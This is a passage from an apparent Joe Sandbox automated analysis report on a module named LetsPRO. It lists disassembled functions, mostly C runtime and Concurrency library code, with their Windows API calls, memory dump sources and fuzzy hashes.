                                        • GetLastError.KERNEL32 ref: 6C947D21
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C947D39
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C947D47
                                        • ??3@YAXPAX@Z.MSVCR100(?), ref: 6C947D54
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ??3@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastThrow
                                        • String ID:
                                        • API String ID: 2208055260-0
                                        • Opcode ID: 6a27a3c7086cf7d5753361e4db0f35f37ccbdd6c9cf1baa997a990aca9c1933d
                                        • Instruction ID: 51a4f39d494eff22599390b9a2547aaac02023ce1b85efe2780aec085230a610
                                        • Opcode Fuzzy Hash: 6a27a3c7086cf7d5753361e4db0f35f37ccbdd6c9cf1baa997a990aca9c1933d
                                        • Instruction Fuzzy Hash: 1D0186B1A102599BCB14DFB4DC00ADE77B8BF65348B108529E415E7640DB38D605CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94AB51 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • CreateThread.KERNEL32(00000000,-00000018,6C940F33,00010000,6C940F21,?), ref: 6C94AB8D
                                        • GetLastError.KERNEL32 ref: 6C94AB97
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C94ABAF
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C94ABBD
                                          • Part of subcall function 6C94AAC4: GetModuleHandleA.KERNEL32(00000000), ref: 6C94AADB
                                          • Part of subcall function 6C94AAC4: GetModuleFileNameW.KERNEL32(6C8F0000,?,00000104), ref: 6C94AAF7
                                          • Part of subcall function 6C94AAC4: LoadLibraryW.KERNEL32(?), ref: 6C94AB08
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Module$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorExceptionFileHandleLastLibraryLoadNameThreadThrow
                                        • String ID:
                                        • API String ID: 488853443-0
                                        • Opcode ID: 408bcf82d2db14e782ac06f89993e8c6ef3df295e9b8c6711677d35918d7e1a5
                                        • Instruction ID: 24488759bb4cdc0d29ebe7719d2debba68e3c77c5d6d869a7b38a5b201e6a4f2
                                        • Opcode Fuzzy Hash: 408bcf82d2db14e782ac06f89993e8c6ef3df295e9b8c6711677d35918d7e1a5
                                        • Instruction Fuzzy Hash: 0EF0C2312002459BDF099FA48C06AAE3B29EF14348F14803DF516D5950DF35C8169B99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9480C2 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C9480C9
                                          • Part of subcall function 6C94911B: InterlockedFlushSList.KERNEL32(?,?,6C9480EB,00000000,6C948E54,00000000,?,?,00000100), ref: 6C949136
                                        • CloseHandle.KERNEL32(?,00000000,6C948E54,00000000,?,?,00000100), ref: 6C9480FC
                                        • CloseHandle.KERNEL32(?,00000000,6C948E54,00000000,?,?,00000100), ref: 6C948109
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,00000000,6C948E54,00000000,?,?,00000100), ref: 6C94812E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseHandle$??3@FlushH_prolog3InterlockedList
                                        • String ID:
                                        • API String ID: 3972622424-0
                                        • Opcode ID: 3e5723349a8843b1fb6682352d50d1b2bfa7126777e2a4ade26a87389ae5c000
                                        • Instruction ID: 3d9d2fe70620424942e41a1c9677862f9392e4ab69721048b04a67a8823f6d96
                                        • Opcode Fuzzy Hash: 3e5723349a8843b1fb6682352d50d1b2bfa7126777e2a4ade26a87389ae5c000
                                        • Instruction Fuzzy Hash: BB018170701701EBDB149BB5C891F9EB3B8BF69218F10880DE465EBB40CB34EA058BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C911C9C Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                        Download Yara Rule
                                        APIs
                                        • _strnlen.LIBCMT(?,00007FFF,6C911D08,00000010), ref: 6C911CC1
                                        • _lock.MSVCR100(00000007,6C911D08,00000010), ref: 6C911CD6
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                          • Part of subcall function 6C911D24: _strlen.LIBCMT(00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D42
                                          • Part of subcall function 6C911D24: _strlen.LIBCMT(00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D51
                                          • Part of subcall function 6C911D24: __fassign.LIBCMT(00000000,00000000,00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D6D
                                          • Part of subcall function 6C911C93: _unlock.MSVCR100(00000007,6C911CF8,6C911D08,00000010), ref: 6C911C95
                                        • _errno.MSVCR100(6C911D08,00000010), ref: 6C93089E
                                        • _invalid_parameter_noinfo.MSVCR100(6C911D08,00000010), ref: 6C9308A9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _strlen$CriticalEnterSection__fassign_errno_invalid_parameter_noinfo_lock_strnlen_unlock
                                        • String ID:
                                        • API String ID: 3718102437-0
                                        • Opcode ID: 40c6823a48eb33a4d1fb8044dc05ce50eb1b84a7b55b03aa9e9d2d0354ca08a3
                                        • Instruction ID: ce371ebb04375524b96b83b4f534c1d2e30ec9d6fb11a9e04615d9c1ba866a6e
                                        • Opcode Fuzzy Hash: 40c6823a48eb33a4d1fb8044dc05ce50eb1b84a7b55b03aa9e9d2d0354ca08a3
                                        • Instruction Fuzzy Hash: 96F09631E0920EFAEB105F70DC027DD3AA0AF71328F2064789418D9AD0DF35D5848654
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C911E7E Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                        Download Yara Rule
                                        APIs
                                        • _lock_file.MSVCR100(?,6C911EE0,0000000C), ref: 6C911EA8
                                          • Part of subcall function 6C90A4CD: _lock.MSVCR100(?,?,?,6C956EF0,00000040,6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C90A4FA
                                        • _fseek_nolock.MSVCR100(?,?,?,6C911EE0,0000000C), ref: 6C911EB9
                                          • Part of subcall function 6C911EFC: _fileno.MSVCR100(?,?,00000001,?,?,6C911EBE,?,?,?,6C911EE0,0000000C), ref: 6C911F41
                                          • Part of subcall function 6C911EFC: _lseek.MSVCR100(00000000,?,00000001,?,?,6C911EBE,?,?,?,6C911EE0,0000000C), ref: 6C911F48
                                          • Part of subcall function 6C911E74: _unlock_file.MSVCR100(?,6C911ED0), ref: 6C911E77
                                        • _errno.MSVCR100(6C911EE0,0000000C), ref: 6C928DB4
                                        • _invalid_parameter_noinfo.MSVCR100(6C911EE0,0000000C), ref: 6C928DBF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_fileno_fseek_nolock_invalid_parameter_noinfo_lock_lock_file_lseek_unlock_file
                                        • String ID:
                                        • API String ID: 4149153117-0
                                        • Opcode ID: 6fd6b663ccd44a624083e79aca0f6f346768095fcb44bc35be15c4f14ed915bc
                                        • Instruction ID: 6c183eb4db444d3face97fff9c8a95f220e9512be3e9ff027fb58e2524023534
                                        • Opcode Fuzzy Hash: 6fd6b663ccd44a624083e79aca0f6f346768095fcb44bc35be15c4f14ed915bc
                                        • Instruction Fuzzy Hash: DFF06232D06519FBEF119FB4DC067CE7A756F32368F118225E8346AEA0CB34D948CA91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C946D80 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C946D87
                                        • EnterCriticalSection.KERNEL32(?,00000008,6C9491A9), ref: 6C946D99
                                        • ??2@YAPAXI@Z.MSVCR100(00000038), ref: 6C946DC1
                                          • Part of subcall function 6C93B79F: __EH_prolog3.LIBCMT ref: 6C93B7A6
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C946DE1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalH_prolog3Section$??2@EnterLeave
                                        • String ID:
                                        • API String ID: 3492688627-0
                                        • Opcode ID: 29b0d9fc575b6c424c738c1555987f87e1ad2693dbd94b3023f5c3c44dfd4ded
                                        • Instruction ID: d83e43b12b46f187472bb6cabb3a6a8c13dbf8a0530adf0ccc5121198b2575db
                                        • Opcode Fuzzy Hash: 29b0d9fc575b6c424c738c1555987f87e1ad2693dbd94b3023f5c3c44dfd4ded
                                        • Instruction Fuzzy Hash: 44F0AFB0605744CEEB609FB4C98978AB6F8AF2175DF10C42ED06AC6E40CB74D148CB11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C900902 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo_memmove
                                        • String ID:
                                        • API String ID: 3898388434-0
                                        • Opcode ID: 8c5f24e3c58f701dbdd84093b3e3eaed29729bef5a6a32609766b24136a0cb8e
                                        • Instruction ID: 725ed41cbba9ce45be8561ff77f346edf3a35cca74d44103108cd1cfbe4ed77a
                                        • Opcode Fuzzy Hash: 8c5f24e3c58f701dbdd84093b3e3eaed29729bef5a6a32609766b24136a0cb8e
                                        • Instruction Fuzzy Hash: 50F0E231211245EFEB215E98AC04BDA37D8AF14718F01103AF9288AA50EB79C848CAA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C912053 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                        Download Yara Rule
                                        APIs
                                        • _lock.MSVCR100(00000007,6C9120A8,0000000C), ref: 6C912071
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                          • Part of subcall function 6C9121D3: wcsnlen.MSVCR100(?,00007FFF,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C9121FD
                                          • Part of subcall function 6C9121D3: wcsnlen.MSVCR100(?,00007FFF,?,00007FFF,?,?,?,00000007,00000007,?,6C912086,?,?,6C9120A8,0000000C), ref: 6C912208
                                          • Part of subcall function 6C9121D3: _calloc_crt.MSVCR100(00000002,00000002), ref: 6C912227
                                          • Part of subcall function 6C9121D3: wcscpy_s.MSVCR100(00000000,00000002,?), ref: 6C91223E
                                          • Part of subcall function 6C9121D3: wcscpy_s.MSVCR100(?,00000002,?,00000000,00000002,?), ref: 6C91225B
                                          • Part of subcall function 6C9121D3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C912299
                                          • Part of subcall function 6C9121D3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C9122B5
                                          • Part of subcall function 6C9121D3: _calloc_crt.MSVCR100(00000000,00000001), ref: 6C9122C2
                                        • _errno.MSVCR100(6C9120A8,0000000C), ref: 6C93110A
                                        • _invalid_parameter_noinfo.MSVCR100(6C9120A8,0000000C), ref: 6C931114
                                        • _errno.MSVCR100(6C9120A8,0000000C), ref: 6C931120
                                          • Part of subcall function 6C91204A: _unlock.MSVCR100(00000007,6C91209F,6C9120A8,0000000C), ref: 6C91204C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_calloc_crt_errnowcscpy_swcsnlen$CriticalEnterSection_invalid_parameter_noinfo_lock_unlock
                                        • String ID:
                                        • API String ID: 813033701-0
                                        • Opcode ID: ae9052bead484b748e72e87693c1092902d78c7d15b4e2aa5574ce1b5981bcc4
                                        • Instruction ID: 9be08accae8a2f412522a26cc0b6937278363a4114fcbe024f005eeb36a6e5cd
                                        • Opcode Fuzzy Hash: ae9052bead484b748e72e87693c1092902d78c7d15b4e2aa5574ce1b5981bcc4
                                        • Instruction Fuzzy Hash: AFF0B431B08A09EFEB00AF74D8067CD3770AF32328F109119E4289AEE0DF39C6498B50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C935CA9 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?_Abort@_StructuredTaskCollection@details@Concurrency@@AAEXXZ.MSVCR100 ref: 6C935CC9
                                          • Part of subcall function 6C944F74: ?_Cancel@_StructuredTaskCollection@details@Concurrency@@QAEXXZ.MSVCR100(?,?,?,?,?,?,?,6C935CCE), ref: 6C944FC0
                                        • __uncaught_exception.MSVCR100 ref: 6C935CCE
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT(00000001), ref: 6C935CF4
                                        • _CxxThrowException.MSVCR100(6C935D09,6C9A0CB8,00000001), ref: 6C935D02
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Collection@details@Concurrency@@StructuredTask$Abort@_Cancel@_Concurrency::unsupported_os::unsupported_osExceptionThrow__uncaught_exception
                                        • String ID:
                                        • API String ID: 176145414-0
                                        • Opcode ID: 2cf7afd18bd990d60c51a43d7924accfac08743652f668e7d27aa3ff008e0bcb
                                        • Instruction ID: 68437ae1cf288aa6b9d7a99e701abedb00aeee7856a91a162413302a2337a3f2
                                        • Opcode Fuzzy Hash: 2cf7afd18bd990d60c51a43d7924accfac08743652f668e7d27aa3ff008e0bcb
                                        • Instruction Fuzzy Hash: 07F0A73090031857CF009BB58109BCC73A89FA524CF14949A4419ABE41DB36D00FCF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C938EDF Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C938EE6
                                        • CloseHandle.KERNEL32(?,00000004,6C938C1A), ref: 6C938F10
                                        • CloseHandle.KERNEL32(?,00000004,6C938C1A), ref: 6C938F24
                                        • ??3@YAXPAX@Z.MSVCR100(?), ref: 6C938F54
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseHandle$??3@H_prolog3
                                        • String ID:
                                        • API String ID: 236738836-0
                                        • Opcode ID: a9ce906bc22e05f6297305da9930cc1a12e709f6f4168d68317df5970ac66e50
                                        • Instruction ID: cc85c78197b60b92186fe1aa80ca6012bf445faa147feefecdaeb9240baa17a8
                                        • Opcode Fuzzy Hash: a9ce906bc22e05f6297305da9930cc1a12e709f6f4168d68317df5970ac66e50
                                        • Instruction Fuzzy Hash: 56F03CB160071087E7209F71C88079A72B9BFA4359F60981DD5ADD7B40CF75E858CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90A8A4 Relevance: 6.0, APIs: 4, Instructions: 32COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _lock_file.MSVCR100(?,?,?,?,?,?,?,6C90A900,0000000C), ref: 6C90A8D1
                                          • Part of subcall function 6C90A4CD: _lock.MSVCR100(?,?,?,6C956EF0,00000040,6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C90A4FA
                                        • _fclose_nolock.MSVCR100(?,?,?,?,?,?,?,6C90A900,0000000C), ref: 6C90A8DC
                                          • Part of subcall function 6C90A84F: __freebuf.LIBCMT ref: 6C90A873
                                          • Part of subcall function 6C90A84F: _fileno.MSVCR100(?,?,?), ref: 6C90A879
                                          • Part of subcall function 6C90A84F: _close.MSVCR100(00000000,?,?,?), ref: 6C90A87F
                                          • Part of subcall function 6C90A91C: _unlock_file.MSVCR100(?,6C90A8F1,?,?,?,?,?,?,6C90A900,0000000C), ref: 6C90A91D
                                        • _errno.MSVCR100(?,?,?,?,?,?,6C90A900,0000000C), ref: 6C928C13
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6C90A900,0000000C), ref: 6C928C1E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __freebuf_close_errno_fclose_nolock_fileno_invalid_parameter_noinfo_lock_lock_file_unlock_file
                                        • String ID:
                                        • API String ID: 1403730806-0
                                        • Opcode ID: 36ffc65c686569e422304f06f84c041f317cfb83a252b966960c9b8942315ee6
                                        • Instruction ID: 6b29aeb91e0a2bb747374d22e1a0ef31b8f227616a9e8d3ebfac91eeb1477015
                                        • Opcode Fuzzy Hash: 36ffc65c686569e422304f06f84c041f317cfb83a252b966960c9b8942315ee6
                                        • Instruction Fuzzy Hash: BEF06D31E02B45DAE7109B748804BDE7AA06F21338F15874D9974A6AD0CF3CC6468B98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93C6C8 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C93C6CF
                                        • EnterCriticalSection.KERNEL32(?,00000008,6C938816), ref: 6C93C6E1
                                          • Part of subcall function 6C9389AC: TlsSetValue.KERNEL32(?,?), ref: 6C9389D7
                                          • Part of subcall function 6C9389AC: GetCurrentThread.KERNEL32 ref: 6C938A03
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C93C71C
                                        • SetEvent.KERNEL32(?), ref: 6C93C72B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$CurrentEnterEventH_prolog3LeaveThreadValue
                                        • String ID:
                                        • API String ID: 2643705923-0
                                        • Opcode ID: 609bc55d97edc088460531a4742a7721d0fba893b8e44ae8f1ed6227298ffb62
                                        • Instruction ID: f682ccc5ce8099985f1ef24e5695e9f9241427950a9988d55a545492af69d3ad
                                        • Opcode Fuzzy Hash: 609bc55d97edc088460531a4742a7721d0fba893b8e44ae8f1ed6227298ffb62
                                        • Instruction Fuzzy Hash: 05F04630900230DBCF11AFA4C48C3DC7BB4AF6134DF0451A9D80B6BA80CB36CA1AC792
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90CA11 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo_wfsopen
                                        • String ID:
                                        • API String ID: 972587971-0
                                        • Opcode ID: 58cdff9a686d0296a655c13c5f27337d5a3a4fd70ef916a92d3c2f460afb8a74
                                        • Instruction ID: 2f8f15f65b8b682ddcc068717af97039a83c48a2f52021059b3dc658dc0af69d
                                        • Opcode Fuzzy Hash: 58cdff9a686d0296a655c13c5f27337d5a3a4fd70ef916a92d3c2f460afb8a74
                                        • Instruction Fuzzy Hash: 9FE02232741224EBC7116E689C01ADE3768AF61B18F000068F9089BB01EF32D80083E4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9423CD Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002), ref: 6C9423DA
                                          • Part of subcall function 6C942161: std::exception::exception.LIBCMT(6C941FF3,?,6C941FF3,00000001), ref: 6C942180
                                          • Part of subcall function 6C942161: _CxxThrowException.MSVCR100(?,6C9A0EAC,6C941FF3), ref: 6C942195
                                        • std::exception::exception.LIBCMT(?,00000008,00000002), ref: 6C9423F2
                                        • _CxxThrowException.MSVCR100(?,6C9A0EC8,?,00000008,00000002), ref: 6C942407
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000002), ref: 6C942411
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Policy$Concurrency@@ElementExceptionKey@2@@Policy@SchedulerThrowValue@std::exception::exception
                                        • String ID:
                                        • API String ID: 1427302437-0
